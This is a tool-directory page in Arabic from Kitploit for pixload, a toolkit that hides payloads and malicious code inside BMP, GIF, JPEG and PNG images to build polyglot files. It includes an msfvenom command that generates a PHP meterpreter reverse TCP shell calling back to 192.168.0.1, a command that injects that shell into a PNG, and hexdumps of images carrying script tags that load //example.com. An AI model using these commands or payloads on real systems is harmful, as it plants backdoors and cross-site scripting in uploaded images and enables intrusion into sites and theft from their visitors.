Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

الخلاصاتاتصالالخصوصية© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
pixload — أدوات إنشاء/حقن الحمولة في الصور | Kitploit
أدوات/GitHubGitHub/sighook/pixload
توليد الحمولةاستغلال تطبيقات الويبإخفاء المعلوماتتطوير الحمولات
GitHubsighook/pixload

pixload

أدوات إنشاء/حقن الحمولة في الصور

عرض المستودع
1.3k25231منذ 3 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

pixload -- أدوات إنشاء حمولات الصور

الوصف

مجموعة أدوات لـ إخفاء الأبواب الخلفية إنشاء/حقن حمولات في الصور.

أنواع الصور التالية مدعومة حالياً: BMP, GIF, JPG, PNG, WebP.

حول

مراجع مفيدة لفهم أفضل لـ pixload وحالات استخدامها:

  • تجاوز CSP باستخدام صور JPEG متعددة اللغات

  • مجموعة اختراق تستخدم صور Polyglot لإخفاء هجمات الإعلانات الخبيثة

  • ترميز Web Shells في أجزاء IDAT لل PNG

  • XSS على فيسبوك عبر PNGs وأنواع محتوى غير تقليدية

  • مراجعة حمولات XSS في أجزاء IDAT لل PNG

إذا كنت تريد تشفير حمولة بحيث تكون الكتلة الثنائية الناتجة كود شيل x86 صالح وملف صورة صالح في نفس الوقت، أنصحك بالنظر إلى هنا و هنا.

msfvenom

إذا كنت تريد حقن حمولة metasploit، يجب عليك القيام بشيء مثل هذا:

  1. إنشاء حمولة metasploit (مثلاً php).
$ msfvenom -p php/meterpreter_reverse_tcp \
	LHOST=192.168.0.1 LPORT=31337 -f raw 2>/dev/null > payload.php
  1. تحرير payload.php إذا لزم الأمر.

  2. حقن payload.php في الصورة (مثلاً png).

$ pixload-png --payload "$(cat payload.php)" payload.png

الإعداد

التبعيات

وحدات Perl التالية مطلوبة:

  • GD

  • Image::ExifTool

  • String::CRC32

على أنظمة Debian-based قم بتثبيت هذه الحزم:

sudo apt install libgd-perl libimage-exiftool-perl libstring-crc32-perl

على FreeBSD و DragonFlyBSD قم بتثبيت هذه الحزم:

doas pkg install p5-GD p5-Image-ExifTool p5-String-CRC32

على OSX يرجى الرجوع إلى هذا الحل البديل (شكراً لـ @iosdec).

البناء والتثبيت
make install

Docker

docker build -t pixload .
docker run -v "$(pwd):/pixload" -it --rm pixload

الأدوات

pixload-bmp

المساعدة
$ pixload-bmp --help
Usage: pixload-bmp [OPTION]... FILE
Hide Payload/Malicious Code in BMP Images.

Mandatory arguments to long options are mandatory for short options too.
  -P, --payload STRING   set payload for injection
  -v, --version          print version and exit
  -h, --help             print help and exit

If the output FILE already exists, then payload will be injected into this
existing file. Otherwise, the new one will be created.
مثال
$ pixload-bmp payload.bmp
...... BMP Payload Creator/Injector ......
..........................................
... https://github.com/sighook/pixload ...
..........................................

[>] Generating output file
[✔] File saved to: payload.bmp

[>] Injecting payload into payload.bmp
[✔] Payload was injected successfully

payload.bmp: PC bitmap, OS/2 1.x format, 1 x 1 x 24, cbSize 10799, bits offset 26

00000000  42 4d 2f 2a 00 00 00 00  00 00 1a 00 00 00 0c 00  |BM/*............|
00000010  00 00 01 00 01 00 01 00  18 00 00 00 ff 00 2a 2f  |..............*/|
00000020  3d 31 3b 3c 73 63 72 69  70 74 20 73 72 63 3d 2f  |=1;<script src=/|
00000030  2f 65 78 61 6d 70 6c 65  2e 63 6f 6d 3e 3c 2f 73  |/example.com></s|
00000040  63 72 69 70 74 3e 3b                              |cript>;|
00000047

انظر صفحة الدليل pixload-bmp(1) لمزيد من المعلومات.

pixload-gif

المساعدة
$ pixload-gif --help
Usage: pixload-gif [OPTION]... FILE
Hide payload/malicious code in GIF images.

Mandatory arguments to long options are mandatory for short options too.
  -W, --pixelwidth  INTEGER   (has no effect)
                              set pixel width for the new image (default: 10799)
  -H, --pixelheight INTEGER   set pixel height for the new image (default: 32)
  -P, --payload     STRING    set payload for injection
  -v, --version               print version and exit
  -h, --help                  print help and exit

The option -W, --pixelwidth has no effect since pixload-gif rewrites
pixel width bytes with "/*" characters, to prepare the polyglot gif image.

If the output FILE already exists, then the payload will be injected into this
existing file. Otherwise, the new one will be created with specified pixels
wide.
مثال
$ pixload-gif payload.gif
...... GIF Payload Creator/Injector ......
..........................................
... https://github.com/sighook/pixload ...
..........................................

[>] Generating output file
[✔] File saved to: payload.gif

[>] Injecting payload into payload.gif
[✔] Payload was injected successfully

payload.gif: GIF image data, version 87a, 10799 x 32

00000000  47 49 46 38 37 61 2f 2a  20 00 80 00 00 04 02 04  |GIF87a/* .......|
00000010  00 00 00 2c 00 00 00 00  20 00 20 00 00 02 1e 84  |...,.... . .....|
00000020  8f a9 cb ed 0f a3 9c b4  da 8b b3 de bc fb 0f 86  |................|
00000030  e2 48 96 e6 89 a6 ea ca  b6 ee 0b 9b 05 00 3b 2a  |.H............;*|
00000040  2f 3d 31 3b 3c 73 63 72  69 70 74 20 73 72 63 3d  |/=1;<script src=|
00000050  2f 2f 65 78 61 6d 70 6c  65 2e 63 6f 6d 3e 3c 2f  |//example.com></|
00000060  73 63 72 69 70 74 3e 3b                           |script>;|
00000068

انظر صفحة الدليل pixload-gif(1) لمزيد من المعلومات.

pixload-jpg

المساعدة
$ pixload-jpg --help
Usage: pixload-jpg [OPTION]... FILE
Hide Payload/Malicious Code in JPEG images.

Mandatory arguments to long options are mandatory for short options too.
  -S, --section COM|DQT         set section for payload injection
  -P, --payload STRING          set payload for injection
  -v, --version                 print version and exit
  -h, --help                    print help and exit

If the output FILE already exists, then payload will be injected into this
existing file. Otherwise, the new one will be created.
أمثلة
  1. حقن الحمولة في قسم التعليق:
$ pixload-jpg -S com payload.jpg
..... JPEG Payload Creator/Injector ......
..........................................
... https://github.com/sighook/pixload ...
..........................................

[>] Generating output file
[✔] File saved to: payload.jpg

[>] Injecting payload into COMMENT
[✔] Payload was injected successfully

payload.jpg: JPEG image data, progressive, precision 8, 1x1, components 1

00000000  ff d8 ff fe 00 25 3c 73  63 72 69 70 74 20 73 72  |.....%<script sr|
00000010  63 3d 2f 2f 65 78 61 6d  70 6c 65 2e 63 6f 6d 3e  |c=//example.com>|
00000020  3c 2f 73 63 72 69 70 74  3e ff db 00 43 00 01 01  |</script>...C...|
00000030  01 01 01 01 01 01 01 01  01 01 01 01 01 01 01 01  |................|
*
00000060  01 01 01 01 01 01 01 01  01 01 01 01 01 01 ff c2  |................|
00000070  00 0b 08 00 01 00 01 01  01 11 00 ff c4 00 14 00  |................|
00000080  01 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
00000090  03 ff da 00 08 01 01 00  00 00 01 3f ff d9        |...........?..|
0000009e
  1. حقن الحمولة في جدول DQT:
$ pixload-jpg -S dqt payload.jpg
..... JPEG Payload Creator/Injector ......
..........................................
... https://github.com/sighook/pixload ...
..........................................

[>] Generating output file
[✔] File saved to: payload.jpg

[>] Injecting payload into DQT table
[✔] Payload was injected succesfully

payload.jpg: JPEG image data, progressive, precision 8, 1x1, components 1
تنزيل الأداة